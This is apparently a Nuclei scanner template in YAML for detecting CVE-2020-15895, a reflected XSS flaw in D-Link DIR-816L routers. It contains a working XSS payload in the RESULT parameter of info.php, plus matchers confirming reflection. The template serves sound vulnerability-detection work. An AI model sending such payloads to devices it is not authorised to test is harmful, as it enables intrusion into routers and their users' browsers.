35 lines
977 B
YAML
35 lines
977 B
YAML
|
id: CVE-2020-15895
|
||
|
|
||
|
info:
|
||
|
name: D-Link DIR-816L - Reflected XSS
|
||
|
author: edoardottt
|
||
|
severity: medium
|
||
|
description: |
|
||
|
An XSS issue was discovered on D-Link DIR-816L devices 2.x before 1.10b04Beta02. In the file webinc/js/info.php, no output filtration is applied to the RESULT parameter, before it's printed on the webpage.
|
||
|
reference:
|
||
|
- https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-15895
|
||
|
classification:
|
||
|
cve-id: CVE-2020-15895
|
||
|
tags: cve,cve2020,dlink,xss
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- "text/html"
|
||
|
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- ";alert(document.domain);"
|